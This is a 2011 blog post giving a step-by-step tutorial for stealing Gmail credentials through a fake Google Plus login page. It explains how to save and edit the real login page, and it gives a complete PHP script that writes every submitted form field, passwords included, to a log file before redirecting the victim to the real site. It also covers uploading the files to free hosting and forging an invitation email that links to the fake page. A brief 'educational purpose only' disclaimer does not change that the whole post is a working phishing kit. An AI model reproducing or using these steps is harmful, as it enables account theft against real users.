Sunday, 4 September 2011

Hack Gmail Using Google Plus Phishing page




I hope till now all of you know what is google plus, so i am not going to write more about Google plus here.


In some places Google plus is still available by invitations only, but in many countries  it has been open for all. But still, there is a way by that you can hack anyone by sending a google plus invitation.


When you send an invitation Google plus send an email to the receiver having a link for the google plus login page(as shown below), here in this trick just you need to replace that link with ur own fake Google plus Page, and as soon as ur victim login from that page to create google plus account, you will get their mail id and password.... ;)



Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.


Let me explain  this hack step by step:


Step 1: Make a Fake Google Plus login page:


1.1 first of all go to GooglePlus's Original Login Page
1.2 Now right click there > save as > and save it.
1.3 Open the saved page in notepad and search for method="post"
1.4 When you find it, in the same line you will see action= "a long url here", delete that url and write login.php also remove action="", see the pic below for help




1.5 Now save this text file with name index having extension html(index.html)


After saving it, your fake page is ready, now you need to make a php file for fetching username and password and redirecting this fake page to a real google plus page so that the victim cant guess about this hack.


Step 2: Making of Php file:


2.1 Open notepad and write the code below and save it with name login.php(same what we have given in front of action in index.html file )

header ('Location: https://plus.google.com/up/start/?continue=https://plus.google.com/&type=st&gpcaz=242878aa ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 3: Upload fake page

Now you have to upload both files created above on a free hosting account. Here i m explaining file uploading on http://www.000webhost.com
1.  first of all sign up for a free hosting Account.Keep remember the link of your domain, you will require that in next step.

2. After activation of your  account, go to controlPannel > file manager > open folder public html > now upload both files here> click on Submit and you are done.

Step 4: Make a Fake Google Plus invitation mail:

4.1 Send an invitation mail to urself(note: send on that mail id,which dont have a G+ account)
Note: If you dont have a google+ account you can request for an invitation by here
4.2 Now you will receive a mail as shown below in pic, now copy each and everything and go too compose mail and paste there or you can just use Forward mail option.



4.3 Now you need to make changes that told in above image in that fake mail, change the link of button with ur own domain created in step 3

After doing that your fake google plus invitation mail  is ready to sent. Now you can sent it to ur victim. and as soon as victim click on the Join Google+ botton,

your fake page will be open same as shown in pic.

And when victim enter its username and password there, then a log file  will be created in ur free hosting account having username and password of victim.



No comments:

Post a Comment